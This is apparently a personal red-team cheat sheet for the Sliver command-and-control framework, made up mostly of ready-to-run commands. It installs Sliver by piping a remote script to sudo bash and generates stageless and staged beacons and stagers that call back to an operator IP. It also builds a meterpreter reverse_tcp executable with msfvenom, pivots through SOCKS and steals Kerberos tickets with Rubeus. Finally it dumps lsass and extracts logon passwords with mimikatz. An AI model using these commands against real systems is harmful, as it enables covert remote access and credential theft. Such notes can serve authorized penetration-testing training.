hckhsn

Sliver CheatSheet

2 min read

Sliver CheatSheet

0.0 Experimental

tishina.in

  • Sliver obfuscation with garble (mentioned as not so easy to setup)
  • Using mangle for implant obfuscation

1.0 Installation

1.1 One-Liner

curl https://sliver.sh/install|sudo bash

1.2 Alternate Method

su root
wget https://sliver.sh/install 
chmod +x install
./install

2.0 Configuration

2.1 Service Check

sudo service sliver start
sudo service sliver status

2.2 First Run

Load updates and plugins.

sliver
sliver> update
sliver> armory install all

3.0 Usage

3.1 Run

Check for updates.

sliver
sliver> update
sliver> armory
sliver> armory update

3.2 Compile a Beacon

3.2.1 Stageless Beacon

generate beacon --http $ip -G --name $beaconname --jitter 5 --seconds 20

3.2.2 Staged Beacon

First, create a profile:

profiles new beacon --arch amd64 --os windows --mtls $ip':443' -f shellcode --timeout 300 --seconds 5 --jitter 1 $profilename

Next, create a stage listener:

stage-listener --url 'http://'$ip':8080' --profile $profilename --prepend-size

Then start another listener, for the stage 2 request:

mtls --lhost $ip --lport 443

Finally, generate the stager:

generate stager -r http --lhost $ip --lport 8080

The generated shellcode can be placed into a dropper, which then can be executed on the target system.

3.2.3 Staged (Workaround)

If Sliver can’t generate the stage, try this:

sliver > profiles new beacon --mtls $ip:443 -f shellcode --timeout 300 --seconds 5 --jitter 1 --debug $profilename
sliver > stage-listener --url tcp://$ip:8899 --profile $profilename --prepend-size
sliver > mtls --lhost $ip --lport 443
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=8899 -f exe -o sliver-s1.exe

3.3 Examples

3.3.1 Socks

sliver > socks5 start
sudo nano /etc/proxychains4.config
>> socks5 1081
 
proxychains -q smb command

3.3.2 Kerberos / Rubeus

rubeus triage 
rubeus dump /service:krbtgt /luid:$LUID /nowrap
 
nano file.b64
cat file.b64 | base64 -d > file.kirbi
impacket-ticketConverter file.kirbi file.ccache
export KRB5CCNAME=file.ccache
klist
 
nxc smb EVERGREEN -k --use-kcache

3.3.3 lsass Dump

ps
576    432    NT AUTHORITY\SYSTEM                  x86_64   lsass.exe 
 
procdump -X -p 576
loot
loot fetch --save /file/lsass.dmp
 
//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords

4.0 Hints

4.1 Useful Commands

execute 
interactive # starts an interactive session
execute-assembly /path/to/cs-tool.exe
rubeus

5.0 References

Kali CheatSheet

Graphansicht